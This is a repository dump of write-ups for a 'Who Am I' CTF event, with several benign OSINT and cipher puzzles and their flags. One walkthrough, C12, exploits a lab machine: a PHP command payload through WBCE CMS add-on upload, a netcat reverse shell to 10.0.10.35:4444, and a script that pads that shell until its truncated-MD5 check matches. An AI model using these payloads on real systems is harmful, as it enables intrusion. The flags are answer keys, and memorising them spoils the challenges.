https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/README.md:
--------------------------------------------------------------------------------
1 | Exploit the vulnerabilies and gain root access to the machine.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/Writeup.md:
--------------------------------------------------------------------------------
1 | # INFO
2 |
3 | This CTF was designed by Elnur Badalov and was Challenge №12 in ICSD's CTF event "Who am I" held on `20.09.2024`.
4 |
5 | This write-up will show the solution to this CTF challenge.
6 |
7 | # Reconnaissance
8 | ## NMAP Scan
9 | ```bash
10 | nmap -p- -sS -sC -sV 10.0.10.25 -v --min-rate 10000
11 | # result
12 | PORT STATE SERVICE VERSION
13 | 21/tcp open ftp vsftpd 2.3.4
14 | | ftp-syst:
15 | | STAT:
16 | | FTP server status:
17 | | Connected to 10.255.1.18
18 | | Logged in as ftp
19 | | TYPE: ASCII
20 | | No session bandwidth limit
21 | | Session timeout in seconds is 300
22 | | Control connection is plain text
23 | | Data connections will be plain text
24 | | At session startup, client count was 3
25 | | vsFTPd 2.3.4 - secure, fast, stable
26 | |_End of status
27 | | ftp-anon: Anonymous FTP login allowed (FTP code 230)
28 | |_Cant get directory listing: PASV IP 172.17.0.2 is not the same as 10.0.10.25
29 | 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)
30 | | ssh-hostkey:
31 | | 256 43:eb:24:ea:01:e5:d2:e0:55:4d:37:95:3c:ac:6a:6e (ECDSA)
32 | |_ 256 97:33:4e:15:41:32:8c:32:86:6c:c3:b6:5c:be:fa:d9 (ED25519)
33 | 80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
34 | |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
35 | | http-title: CMC - A test post to test CMS
36 | |_Requested resource was http://10.0.10.25/wbce/
37 | |_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
38 | |_http-generator: WBCE CMS; https://wbce.org
39 | | http-methods:
40 | |_ Supported Methods: GET HEAD POST OPTIONS
41 | 3389/tcp open ms-wbt-server Microsoft Terminal Services
42 | | ssl-cert: Subject: commonName=WINDOCL-GI0DS47
43 | | Issuer: commonName=WINDOCL-GI0DS47
44 | | Public Key type: rsa
45 | | Public Key bits: 2048
46 | | Signature Algorithm: sha256WithRSAEncryption
47 | | Not valid before: 2024-09-11T00:50:52
48 | | Not valid after: 2025-03-13T00:50:52
49 | | MD5: 8043:0cbe:6a96:c2d8:61fb:7dea:c545:61df
50 | |_SHA-1: 2771:80d5:854a:3296:0f47:7072:934c:86d1:a095:44fd
51 | |_ssl-date: 2024-09-23T06:33:02+00:00; 0s from scanner time.
52 | | rdp-ntlm-info:
53 | | Target_Name: WINDOCL-GI0DS47
54 | | NetBIOS_Domain_Name: WINDOCL-GI0DS47
55 | | NetBIOS_Computer_Name: WINDOCL-GI0DS47
56 | | DNS_Domain_Name: WINDOCL-GI0DS47
57 | | DNS_Computer_Name: WINDOCL-GI0DS47
58 | | Product_Version: 10.0.20348
59 | |_ System_Time: 2024-09-23T06:33:01+00:00
60 | ```
61 | 4 ports are open:
62 | - 21 - `vsftpd 2.3.4`. It has a Public Exploit for getting an RCE.
63 | - 22 - ssh.
64 | - 80 - a web app - CMS.
65 | - 3389 - RDP. It may mean that there is Windows machine.
66 | ## FTP Reveals a Hidden File
67 |
68 | FTP allows anonymous login, and we find a hidden file `.note.txt`. We can download it using the `get` command.
69 | 
70 | It has the following note:\
71 | ```
72 | You could ask me to give you a virtual machine in the Cloud. Why are you doing such weird thing, Mr. Windoclin? Who setups Windows Server that way?
73 |
74 | Additionally, add me to the Github Repository as a Contributor.
75 | ```
76 | Here, we learn that the user's name is `Windoclin` and he did something extraordinary with Windows. Additionally, he may have a GitHub account.
77 |
78 | ### Rabbit Hole
79 |
80 | Although the FTP service seems exploitable (vsftpd 2.3.4 has a public exploit for backdoor command execution via CVE-2011-2523), it is a **rabbit hole** and won’t be useful.
81 | ## Github OSINT
82 | Searching for `windoclin` on GitHub reveals a repository that points to his profile.
83 | 
84 | We discover another repo called *autotask*:
85 | - https://github.com/windoclin/autotask
86 | 
87 | It contains automation scripts that leak credentials:
88 | 
89 | ```python
90 | ...
91 | username = "supascrtadminus3r"
92 | password = "supascrtp4ssw0rd!!"
93 | ...
94 | ```
95 | # CMS
96 | ## Recon
97 | When we send a GET request to the IP, it redirects to `http://10.0.10.25/wbce/`.
98 |  If we request the new URL again (or navigate to it in a browser), we see it requires resources from `http://windoclin/wbce`. This indicates we need to add the `windoclin` hostname to the `/etc/hosts` file.
99 |  `wbce` in the URL suggests that the CMS in use is WBCE.
100 |  This CMS does exist, and it has several exploits available.
101 | 
102 | ## CMS Admin Access
103 | By checking some common directory names, we can find the **admin portal** of the CMS, where we can log in using the credentials found earlier.  From the admin dashboard, we find the following information: `WBCE Version: 1.6.2`.
104 | ## RCE
105 | We use the following exploit:
106 | - https://github.com/capture0x/WBCE_CMS/
107 |
108 | To get RCE, navigate to **Add-ons**, then **Languages**, and **install a language**.
109 | 
110 | Let’s try a simple payload:
111 | ```php
112 | <?php system('whoami');?>
113 | ```
114 | Write this to a PHP file, upload it, and click **Install**.
115 | 
116 | The exploit succeeded! We got `nt authority\system`, which grants the highest privilege on the system.
117 | ### Reverse Shell
118 | For a reverse shell, I used this exploit:
119 | - https://github.com/ivan-sincek/php-reverse-shell
120 | Modify port and IP and repeat the steps:
121 | 
122 | # Windows Enumeration
123 | Let's check Desktop of the **windoclin** user:
124 | 
125 | We find a shortcut to a folder located in a network share: `\\host.lan`.
126 | ```powershell
127 | net view \\host.lan
128 | # gives
129 | ...
130 | Data Disk Shared
131 | ...
132 |
133 | # next, mount the share
134 | net use Z: \\host.lan\Data
135 |
136 | # cd there
137 | Z:
138 | Z:\>dir
139 | Volume in drive Z is Data
140 | Volume Serial Number is AC24-E051
141 |
142 | Directory of Z:\
143 |
144 | 09/12/2024 09:19 AM <DIR> .
145 | 09/12/2024 09:19 AM <DIR> ..
146 | 09/12/2024 02:36 AM 21,846,505 1.6.2.zip
147 | 09/12/2024 09:12 AM 2,468 healthy.sh
148 | 09/12/2024 10:25 AM 665 prevention.sh
149 | 09/12/2024 09:19 AM 166 README.MD
150 | 09/11/2024 10:19 AM 7 user.txt
151 | 01/30/2024 11:47 PM <DIR> WBCE_CMS-1.6.2
152 | ```
153 | Congratulations! We found `user.txt`!
154 | 
155 | # Windows Docker Escape
156 | Three files interest us:
157 | - `README.MD`
158 | - It contains `6238383731656632663334623638393836333933353130373530653833323635` which is `b8871ef2f34b68986393510750e83265` decoding from HEX.
159 | ````markdown
160 | # A Note from Mr. Windoclin
161 | ```
162 | 6238383731656632663334623638393836333933353130373530653833323635
163 | ```
164 |
165 | Do not modify the `healthy.sh`, otherwise it will not run**!**
166 | ````
167 | - `prevention.sh`
168 | - This is a custom script designed to prevent another script from being executed if it’s been overwritten.
169 | ```bash
170 | #!/bin/bash
171 |
172 | if [ "$#" -ne 2 ]; then
173 | echo "Usage: $0 <script_to_run> <expected_md5_prefix>"
174 | exit 1
175 | fi
176 |
177 | script_to_run=$1
178 | the_md5=$2
179 |
180 | if [ ! -f "$script_to_run" ]; then
181 | echo "Error: The script '$script_to_run' does not exist."
182 | exit 1
183 | fi
184 |
185 | actual_md5_prefix=$(md5sum "$script_to_run" | awk '{print $1}' | cut -c 1-4)
186 | expected_md5_prefix=$(echo "$the_md5" | awk '{print $1}' | cut -c 1-4)
187 |
188 | if [ "$actual_md5_prefix" == "$expected_md5_prefix" ]; then
189 | echo "MD5 checksum matches. Running the script..."
190 | bash "$script_to_run"
191 | else
192 | echo "MD5 checksum does not match. Expected '$expected_md5_prefix', but got '$actual_md5_prefix'."
193 | exit 1
194 | fi
195 | ```
196 | - `healthy.sh`
197 | - This script runs regular health checks. Using the following command, we can get its MD5 checksum:
198 | ```powershell
199 | certutil -hashfile .\healthy.sh MD5
200 | # result
201 | MD5 hash of .\healthy.sh:
202 | b8871ef2f34b68986393510750e83265
203 | ```
204 |
205 | The MD5 hash `b8871ef2f34b68986393510750e83265` matches the one in the `README.MD` file.
206 |
207 | Overall, the mechanism implemented here is used for performing regular health checks from a machine that connects to the shared folder. Additionally, it employs an *insecure* method for preventing the execution of an overwritten file, as it only checks the first 4 characters of the MD5 hash. This makes it vulnerable to a brute-force attack using the following script:
208 |
209 | `brute.sh`
210 | ```bash
211 | #!/bin/bash
212 |
213 | # prepare the payload
214 | FILE_PATH="shell.sh"
215 | echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.0.10.35 4444 >/tmp/f' > $FILE_PATH
216 |
217 | TARGET_CHECKSUM="b887"
218 |
219 | # add '#' to the end of shell file till first 4 characters are match
220 | while true; do
221 | CURRENT_CHECKSUM=$(md5sum "$FILE_PATH" | awk '{ print $1 }' | cut -c 1-4)
222 |
223 | if [ "$CURRENT_CHECKSUM" == "$TARGET_CHECKSUM" ]; then
224 | echo "The file's checksum now matches the target: $CURRENT_CHECKSUM"
225 | break
226 | fi
227 |
228 | echo -n "#" >> "$FILE_PATH"
229 |
230 | done
231 | ```
232 | After creating `shell.sh`, transfer it onto the target machine, which can be done via a Python server.
233 | 
234 |
235 | Then, on the target machine, replace the file in `Z:/`:
236 | ```powershell
237 | Invoke-WebRequest -Uri http://10.0.10.35:8000/shell.sh -OutFile healthy.sh
238 | ```
239 |
240 | Set up a listener and wait for a connection.
241 |
242 | Finally, voilà! We successfully obtain a shell and retrieve `root.txt`!
243 | 
244 | # Conclusion
245 | By exploring further, we can find a `docker-compose.yml` file, which reveals that **Windows** is running as a **Docker container** on a **Linux** host. The shared folder we accessed earlier is mounted between the Linux host and the Docker container.
246 | 
247 | 
248 |
249 | This was a non-standard Docker escape technique that leveraged weak file integrity checks.
250 |
251 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/README.md:
--------------------------------------------------------------------------------
1 | # Decode the Escape
2 |
3 | Find the Flag.
4 |
5 | ```plaintext
6 | "Some will call it practice, some will call that luck,
7 | But either way you're going to the history books"
8 |
9 | L4wTKLUUxgtfNz7yudA2zCGaujhZ7WwGkFZbAJAgwReuTEbZ4szScUXXDkxacmaNXcs7GpELSRdx8WbCBwC6SZtGtBMFfJspjGU2SQayckz7sFErDCq2bf79jNqf3yi1EyU8hrvw9LRQWakKJHYkgcoGa7ub6NkSD8hAxTTmHVjvp4y9YP9C79y9fFASJiU4xj2Xp54WPHf8x5HkCo5d2jDEqSVUXU9hXAbTrX6K3fTRFr69FEvWMCntQmS1UCCiHvEEuHxVgvJhVRAhyS8pLkppSRNt6QY1EmZKDHwWeP7kyCx9w8gm6Nf74X2VyfGWABBunvrWtDN6sh5SetHCYLMvtbpwLaoVMeN5VTG8tUAutiK61NARaMZTmWGWki2wqaMmZAKiLoPHA3hXBkoLLTXd9cdWZVT1SSSWuCH4QmszSvL2TtjaugVFmCMejehVPufSaojNCyepsjRR8Q5cSYwqcEAHL81iNVUXPFoV3xUdgJAxzVfL3QsnDLeTyex
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | First of all, we need to search for the song lyrics given in the task. It’s the song called **Hall of Fame** by The Script:
4 |
5 | 
6 |
7 | The secret message given to us is Base58 encoded value:
8 |
9 | 
10 |
11 | It looks like a cipher. As we are given a song that can be used for some purposes, we can guess that the ciphertext is a result of the Vigenere cipher.
12 |
13 | ***But what is the key?***
14 |
15 | Let’s try the song name - “**halloffame**” - and see the result:
16 |
17 | 
18 |
19 | Yes, it is the right key! We are given another message:
20 |
21 | **“Happiness can be found, even in the darkest of times, if one only remembers to turn on the light.”**
22 |
23 | **How can you fight off this prison's guards?**
24 |
25 | The first quote is from the “Harry Potter and The Prisoner of Azkaban”, which can be found with a little Google search:
26 |
27 | 
28 |
29 | As we can guess, the Azkaban is a prison name. So we need to conduct another search to find out how we can fight off the guards of this prison?
30 |
31 | The guards of Azkaban are called **Dementors**:
32 |
33 | 
34 |
35 | We can fight off Dementors with…
36 |
37 | 
38 |
39 | The Patronus Charm! Good. We collected some information, so let’s analyze the secret message. It is another Base64-encoded value:
40 |
41 | 
42 |
43 | Well, it does not work. We have to look for another way.
44 |
45 | However, searching for the Patronus charm in Google would give something juicy:
46 |
47 | 
48 |
49 | Let’s raise the wands and say the magic words:
50 |
51 | 
52 |
53 | The spell worked! Challenge solved! 🪄🪄🪄
54 |
55 | Flag: **`ICSD_2024{a9Vb44x55wLt4Pn8KrHd}`**
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/README.md:
--------------------------------------------------------------------------------
1 | **C3 - ANAIS_WATT3RS0N**
2 |
3 | *Anais Watterson's beloved donkey doll, was thrown from a school bus by other children. Unfortunately, Anais has lost not only a beloved toy but also a hidden flag within it that holds great importance to her. Now she needs your assistance to retrieve it. Anais has created a Twitter account to share clues and reach as many people as possible to aid in the search. Your mission is to retrace the hints, find the doll, and bring it back. Ready to help Anais recover her treasured possession and restore her smile?*
4 |
5 | 
6 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/Writeup.md:
--------------------------------------------------------------------------------
1 | # C3 - ANAIS_WATT3RS0N
2 |
3 | Here we see that in the description it's mentioned that Anais created a Twitter account and name of the challange looks like a challange name. We search it on Twitter (R.I.P.), and we see an account:
4 |
5 | 
6 |
7 | Browsing through it, we noticed that Anais first asked for help, and later found some strange, unreadable text stuck to her door:
8 |
9 | 
10 |
11 | From its format, we suspected it might be encoded in one of the Base encoding types, so we used CyberChef (https://gchq.github.io/CyberChef/) to decode it:
12 |
13 | 
14 |
15 | Voilà! We finally cracked it. It revealed the name of a location: Mare Island San Pablo Bay Hiking Trail. We searched for it on Google Maps:
16 |
17 | 
18 |
19 | Usually, in these kinds of puzzles, we find interesting clues in the comments section, so we looked there (sorted by newest):
20 |
21 | 
22 |
23 | That's when we discovered that Tina, the fearsome bully of Elmore Junior High, had taken Anais's doll. But did you know Tina did it because she couldn't sleep at night? Now you know both the flag and the reason behind her actions.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/README.md:
--------------------------------------------------------------------------------
1 | ## #exec cmd="whoami"
2 |
3 | ### Task
4 |
5 | Analyze the picture and answer the questions.
6 |
7 | 
8 |
9 | **Question 1.** Who is the owner of this picture?
10 |
11 | **Question 2.** What is the email address of him?
12 |
13 | **Question 3.** Which country is he living in?
14 |
15 | **Question 4.** Find the flag.
16 |
17 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | **Question 1.** Who is the owner of this picture?
4 |
5 | To find out this information, extracting the exif data of this picture is enough:
6 |
7 | 
8 |
9 | **ANSWER**: **Marko Ivan Marojević**
10 |
11 | ---
12 |
13 | **Question 2.** What is the email address of him?
14 |
15 | By analyzing the picture attentively, the GitHub logo can be easily noticed. So we have to search for Marko Ivan in the GitHub.
16 |
17 | Searching for **Marko Ivan Marojević** in the GitHub:
18 |
19 | 
20 |
21 | GitHub profile of Marko Ivan:
22 |
23 | 
24 |
25 | In the greeting page, we can easily collect information such as where he is studying, where he is working, how to contact him.
26 |
27 | **ANSWER**: **ivan.marojevic@prvabankacg.com**
28 |
29 | ---
30 |
31 | **Question 3.** Which country is he living in?
32 |
33 | We can see that Marko is an intern at “Prva banka Crne Gore AD”, in Podgorica. Podgorica is the capital city of Montenegro.
34 |
35 | **ANSWER**: **Montenegro**
36 |
37 | ---
38 |
39 | **Question 4.** Find the flag.
40 |
41 | There is a repository in Marko’s profile:
42 |
43 | 
44 |
45 | And the note left in the main page of Marko is this:
46 |
47 | 
48 |
49 | ***Sometimes it is good to retrospect…*** It means that we should look into something history-related.
50 |
51 | ***Maybe a commit history?***
52 |
53 | 
54 |
55 | Clicking on the **Commits** link gives us the commit history:
56 |
57 | 
58 |
59 | The Base64-encoded value:
60 |
61 | 
62 |
63 | **ANSWER**: **`ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}`**
64 |
65 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png
